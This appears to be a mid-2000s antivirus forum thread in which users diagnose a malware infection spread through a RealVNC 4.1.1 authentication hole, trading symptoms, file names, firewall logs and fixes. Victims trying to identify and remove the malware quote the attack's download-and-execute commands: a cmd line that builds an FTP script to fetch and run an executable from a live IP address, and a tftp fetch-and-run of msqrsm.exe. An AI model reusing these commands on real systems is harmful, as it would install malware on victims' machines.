DOS (tftp) virus

Hello,

we have the same malware here it seems.
It is seen the same way by PrevX1, and activate regularly some cmd script TFTPxx.
It also creates louvz.exe and others in c:\windows\system32 and launch them, and a lot of bad thinks !
example in a cmd : cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

It is MSQRSM, non detected by Avast , neith erother anti-virus (NAV, Grisoft) ou anti spyware (Ad aware).
but detected by PREVX1

I’d like to send you the .exe file .exe (237kb) for analyse and integration in Avast database, but it is in c:\system volume information-RESTORE{F75EEC69-6E97-419B-93B4-6A3A275301C4}\RP296\AA0044493.exe
and non accessible.
I deactivated Windows restauration on all hard drive and rebooted, but still no access to this directory, neither directly, or for anti-virus soft !
I am working remotely on my father’s PC, and cant boot on a DOS disck !

Any idea please to copy this file and send to you ?
It came by clicking a url in an HTML spam email … but I erased the email (just too soon…)

OS = OS Windows XP SP2 home à jour des updates
Avast version 4.7.871 august 2006 - skin 4.2.7.3
Athlon 64 3200+ 512 MB ram
messagerie Thunderbird
NAV + Avast

le logiciel lance des fenetres CMD avec des scripts de téléchargement TFTP xx, il empèche la connexion de mozilla et thunderdbird au web et comptes smtp / pop, il crée différents exe dans windows/system32, qui sont executés (vus dans le getionnaire des taches) etc. ASSEZ NOCIF…

Thanks
FX

Hello FX,

You mention that you are working remotely on your dad’s machine? Are you using RealVNC 4.1.1? If so - it has a security hole that can be breached in the auth module. Check out this site for more info:

http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html

Rgds. Otto.

Hi aplcom,

Thank you for ethereal information I understand, you are right about action is unlikely from ISP. Since this is now running in Europe too I assume Scotland Yard allready know about it.

From what we experience at least on some occasions [yes still running but that was an oversight on our behalf ] seems to be a download to another IP address than the host machine. The trouble you saw was the attempt to download to your IP address?

I just see your question to FXsan78 come in, was going to inquire about the version too. I guess he is in trouble as the dirt software already running.

@FXsan78
what keyboard layout is installed on your attacked machine? I noticed the French at the bottom and I am very interested in type of keyboard you use on the target machine.

C.

Hi aplcom,

I forgot to add that for many weeks our computer has been running ‘stealth’ mode according to grc.com. That was why I could not figure out how something had gotten through apparently without any action on the part of the operator. It is however likely to be wishfull thinking that my daughter did not get it by email.

With vnc running all the time well bad luck for us.

C.

Hi FX,

When you turned off System Restore you effectively deleted the file from that location. If its still on your hard drive somewhere else you can email a zipped and password protected sample to virus@avast.com. Make sure to explain that it is an undetected virus and provide the password in the body of your email.

If you’re using RealVNC make sure you follow aplcom’s link to patch this security hole.

@aplcom and cylosine,

If FX’s infection is the same as yours then you may find the problem recurs even after applying the RealVNC patch. If it does then do as FX did: turn off System Restore, reboot, and scan again.

We have installed RealVNC 4.1.2 and are trying to log the attacks. They seem to still occur but now Sygate Personal Firewall is warning of attempts to connect VNC session. We have decided to keep VNC server running for a while.

From the data we believe that the attack is coming from a computer in the same big network which our computer is connected to. I am guessing this is a random number and that it is automated. Hope to catch a few more before the attacks stop. The originator can’t be that silly to keep it up for a long time allowing tracing.

I noticed that the free version of VNC is a bit limited in the use of encryption for this reason I am reconsidering its use over the internet, it is a bit of a jungle to get through safely.

C.

Hi,

I’ve not had any re-occurance at all. Once I realized what the problem was, I booted from a clean “Win Live CD” and cleaned the hdd (deleted all tmp areas, deleted recycled etc etc etc) - ran several diff antivirus scanners and also manually cleaned the registry. I also put cmd.exe, tftp.exe, ftp.exe and several other pgms into a secure area only accessable by me (also renamed those pgms) just to be safe. I also re-installed the firewall from scratch and set new rules (Using Zonealarm - ONLY vnc has server rights - all else locked out).

I agree - the attack seems to occur on the same ISP network (mine is 221.124.x.y) - leads me to believe that someones computer on the network is compromised and the hacker is using that system to hack others on the same network. As the attack is identical every time - I also cant believe the hacker to be so stupid (hence it may be a bot??)

You can also consider ultraVNC or tightVNC - both are free - both offer super encryption - both dont have the auth security hole - however - realVNC 4.1.2 seems to have solved most of my problems.

Keeping my fingers crossed - but alls well so far!!

Rgds.

Hello,

@ aplcom/Otto, yes I was using RealVNC 4.1.1.
I upgraded to 4.2 (30days version) after reading the post here.
Now I have found back a version 4.1.2 which is full without 30 days licence. I will install it back after solving everything

@cylosine, yes AZERTY french keyboard

@mauserme, as I said I deleted the email I suspected to have the link importing the virus, and sorry I could not send it to you

Tonight NAV reports a Magister virus. I will try remove tool, but will need some local aid for booting in safe mode :wink:

Thanks to all
fX

Hi FXsan78,

VNC 4.2 is the “VNC Personal” version which costs money, I also got a bit confused and downloaded this but went searching a bit more for the so called “VNC Free” until I found it.

I am making a strong guess that the machine that attacked you also had a French AZERTY keyboard, this however unlikely to be of any help.

Depending on how familiar you are with computers I can recommend always having a Bart PE boot disk, this is a short version of Windows which will boot and run windows off a CD and you can access your hard disk from this environment.

This is similar to what aplcom is saying about using a “Win Live CD”.

C.

Hi all, this is my first post,

My company have 4 servers running 3 is windows 2000 and 1 is windows 2003, 4 day ago, when I using VNC remote to my company servers from my home, I saw all servers auto open cmd command in run, and in command auto type tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe, checked the firwall log always had my server SRC address 192.168.0.3 to DEST address 192.168.x.x (x.x mean radom), SRC port is 22xx (xx mean radom), DEST port 5900, and 1 mins can sent many packet to random private IP…

Any brother can tell me what type of Vrius Infected? and how to fix this problem ?
or just need upgrade the VNC version to 4.1.2 to solve all problem ?

Home VNC version 4.1.2, company server VNC version 4.1.1

Thanks !!!
Wilson

Hi leiw,
May you find inspiration and help in the forum.

1… Version 4.1.1 you can not get rid of fast enough, especially now you have seen that somebody knows perhaps accidentally that your servers exists.

Upgrading to 4.1.2 get you over the initial flaw ban if you are using the free version I would suggest you do review this for use over the internet. Reading the small print/manual or specs closer this is not recommended when you cross the internet jungle as the password encryption is not strong. The normal session information I understand is just open to anybody with no encryption.

I forgot this and happyly used it for 12 months until it went bad. If your company information is.important you should consider the ‘bigger’ versions which have much better encryption and encryption on the session transmissions. Convince yourself you understand all this because I am not an expert just have some reasonable understanding about various aspects of computing.

Consider moving away from using the default port of 5900, perhaps that may give you some protection. “everybody” knows that port and will almost by default have this in their software. Just makes it a little bit harder for unwanted sniffing.

I am deliberately using the underscore in the next lines

tftp -i 0.0.0.0 GET msqrsm_exe

msqrsm_exe

My understanding is the first line downloads the dirty file to IP address 0.0.0.0 where I am not sure of the importance of 0.0.0.0, I had expected your Public IP address here, could be a very good thing.

The second line executes the msqrsm_exe, if it had been downloaded to your machines or network, you must go looking for how to get rid of what it has downloaded.

The only place I have seen help is PREVX1, I am still trying to find out more. Actually I have put our machine on sort of hold as I have run out of energy to focus on just this bastard.

Like you I have still no idea how our machine got activated. Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall. Unforunately the NAT router was not installed on the cable modem. We did not have that extra protection, which you seem to have as you are on a 192.168.1.x network.

Do you have a software firewall as well as NAT, I may be a little bit out on deep water as you talked about servers and I talk about hosts. You may be better protected.

Have you facility to log all incoming and outgoing traffic? If so this should reveal a lot about what msqrsm_exe.

Where it came from? No idea

Good luck and I hope it did not run.

C.

To Cylosine:

Thank for your reply, I will go back to compay to upgrade the VNC to 4.1.2 version, one question is after upgraded the VNC, the auto command will be disappear ? or need use PREVX1 to clear all dirty file? but I think maybe cannot clear all dirty file, because I was tried it.

I using Shorewall that is Linux free firewall inculded NAT, packet filtering etc, now I droped all outgoing traffic for perevent, Iwill post the firewall log when I go back to company.

Hi leiw

1… The command windows may disappear, if they are coming from the outside.
2… If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But I am not looking at the moment.
C.

I believe 0.0.0.0 designates “default route” in this case. This way an outbound connection can be established without knowing the address for the gateway and may hide the underlying process to some degree.

Certainly port 5900 is open during an active session but keep in mind that the GRC site doesn’t scan that high (it only goes as high as port 1055 for the Scan All Service Ports test and includes port 5000 (but nothing higher) for the Common Ports test). If you want to test this further you could try the scanning tools at PC Flank which has an option to specify a port under the Advanced Port Scanner tab

http://www.pcflank.com/scanner1s.htm

or a program like Nmap (use cautiously lest you get booted by your ISP).

From this point of view it could be a random scan but maybe more likely an attacker targeting the vulnerability.

I’m guessing #1 will be the case if your server is being cracked during an active session, but you might still need to remove malware (so far I haven’t seen any indication that its originating on the client).

#2 is a definite if the problem originates on the server in the form of something like a trojan downloader.

The answer to which of these is the case may be in when the problems occur - only during an active session or randomly when the server is idling. Does anyone have information on this?

Hi mauserme,

About 0.0.0.0 I was hoping this was not the case, wonder what happened.

GRC test, thanks for pointing out the scan is limited to ‘service’ group. I forgot that higher up one must be more specific, the largest range scan is 64 ports at a time. A scan of 5900-5963 only revealed that 5900 is known as vnc entry.

General: I have just done a search on the internet for following files, and listed what viruslabs seem to have some info:

msinexecs.exe prevx
msqrsm.exe prevx
winlolx.exe prevx, sophus?
louvz.exe nothing mentioned

Has anybody else seen better information on these?